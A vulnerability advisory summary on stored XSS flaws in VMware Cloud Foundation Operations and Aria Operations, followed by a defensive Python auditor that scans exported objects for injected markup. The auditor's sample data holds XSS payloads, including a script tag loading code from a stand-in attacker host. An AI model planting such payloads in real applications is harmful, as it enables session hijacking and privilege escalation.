Severity
High
Analysis Summary
Broadcom has disclosed three high-severity stored cross-site scripting (XSS) vulnerabilities, tracked as CVE-2026-41722, CVE-2026-41723, and CVE-2026-41724, affecting VMware Cloud Foundation Operations and several related VMware products. The flaws were addressed in security advisory VMSA-2026-0004, released on June 8, 2026. Each vulnerability carries a High CVSS v3 severity rating and stems from improper sanitization of user-supplied input, which allows authenticated attackers to inject malicious scripts into the platform. Broadcom has confirmed that no workarounds are available, making the installation of security updates the only effective mitigation.
The vulnerabilities impact VMware Cloud Foundation Operations, VMware Aria Operations, VMware Cloud Foundation, VMware vSphere Foundation, and VMware Telco Cloud Platform. Stored XSS attacks are particularly dangerous because the malicious payload is permanently stored within the application and executed whenever another user accesses the affected component. Unlike reflected XSS attacks, stored XSS can repeatedly target multiple users, increasing the likelihood of successful compromise and expanding the attack surface within enterprise virtualization environments.
According to Broadcom, an attacker with authenticated access and permissions to create policies, views, or text widgets can inject specially crafted JavaScript code into these objects. When another user, including a higher-privileged administrator, loads the affected interface, the malicious script executes in the context of that user's session. This could enable attackers to perform unauthorized administrative actions, manipulate system configurations, access sensitive information, or escalate privileges within the virtual infrastructure management environment. The vulnerabilities were privately reported by Researcher.
Broadcom has released patches for all affected products, including VMware Cloud Foundation Operations 9.1.0.0 and 9.0.2.0 EP2, VMware Aria Operations 8.18.6 and 8.18.7, and corresponding updates for VMware Cloud Foundation and VMware Telco Cloud Platform. Organizations are strongly advised to prioritize patch deployment due to the lack of alternative mitigations. Additionally, administrators should review and restrict permissions related to creating policies, views, and text widgets, limiting these capabilities to trusted users while updates are being applied. Prompt remediation is essential to prevent privilege abuse and reduce the risk of compromise across virtualized infrastructure environments.
Impact
- Gain Access
Indicators of Compromise
CVE
CVE-2026-41722
CVE-2026-41723
CVE-2026-41724
Remediation
- Upgrade all affected VMware products to the latest fixed versions released by Broadcom, including VMware Cloud Foundation Operations 9.1.0.0, 9.0.2.0 EP2, and VMware Aria Operations 8.18.7 where applicable.
- Prioritize patch deployment across internet-facing and critical virtualization management environments due to the absence of available workarounds.
- Review and restrict permissions for creating policies, views, and text widgets, limiting these capabilities to trusted administrators only.
- Apply the principle of least privilege so that as few accounts as possible hold the permissions needed to exploit the vulnerabilities.
- Regularly audit user roles and administrative privileges to identify and remove unnecessary access rights.
- Monitor VMware management interfaces and logs for suspicious script injections, unauthorized configuration changes, or unusual administrative activity.
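As an added illustration of the monitoring step (not code from Broadcom, VMware or the advisory), the following Python audits an export of user-authored policies, views and text widgets and flags fields that should be plain text but contain markup, inline event handlers or javascript: URIs, reporting the owning account for follow-up. The JSON export shape and the sample records are constructed for this example; a real export would be mapped onto the same field names.

```python
import json
from html.parser import HTMLParser

# Constructed sample export of user-authored objects; illustrative records only, not a real product export.
SAMPLE_EXPORT = json.dumps([
    {"id": "view-1001", "type": "view", "owner": "alice",
     "name": "Cluster capacity", "description": "Weekly capacity summary for cluster A"},
    {"id": "widget-2002", "type": "text_widget", "owner": "bob",
     "name": "Notes", "content": "<img src=x onerror=\"alert(1)\">"},
    {"id": "policy-3003", "type": "policy", "owner": "carol",
     "name": "Prod SLA", "description": "<script src=\"https://attacker.invalid/x.js\"></script>"},
    {"id": "widget-4004", "type": "text_widget", "owner": "dave",
     "name": "Formatting test", "content": "Use <b>bold</b> text; a < b is fine"},
])
TEXT_FIELDS = ("name", "description", "content")  # fields expected to hold plain text

class MarkupDetector(HTMLParser):  # records tags, inline event handlers and javascript: URIs
    def __init__(self):
        super().__init__()
        self.tags, self.event_attrs, self.uri_attrs = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:  # html.parser already lowercases attribute names
            if name.startswith("on"):  # onerror=, onload=, ...
                self.event_attrs.append(name)
            elif name in ("href", "src", "action") and value \
                    and value.strip().lower().startswith("javascript:"):
                self.uri_attrs.append(name)

def audit_text_field(text):  # findings for one field; an empty list means no markup at all
    det = MarkupDetector()
    det.feed(text)
    det.close()
    findings = ["script-tag"] if "script" in det.tags else []
    findings += [f"event-handler:{a}" for a in det.event_attrs]
    findings += [f"javascript-uri:{a}" for a in det.uri_attrs]
    if det.tags:  # any markup in a plain-text field deserves review, even harmless-looking tags
        findings.append("markup:" + ",".join(sorted(set(det.tags))))
    return findings

def audit_export(export_json):  # one record per (object, field) that contains markup
    hits = []
    for obj in json.loads(export_json):
        for field in TEXT_FIELDS:
            value = obj.get(field)
            if isinstance(value, str) and (findings := audit_text_field(value)):
                hits.append({"id": obj["id"], "owner": obj["owner"],
                             "field": field, "findings": findings})
    return hits
```

Plain text containing a bare `<` (such as "a < b") is not reported, so comparison operators in descriptions do not produce noise; anything reported should be reviewed together with the owning account's role assignments.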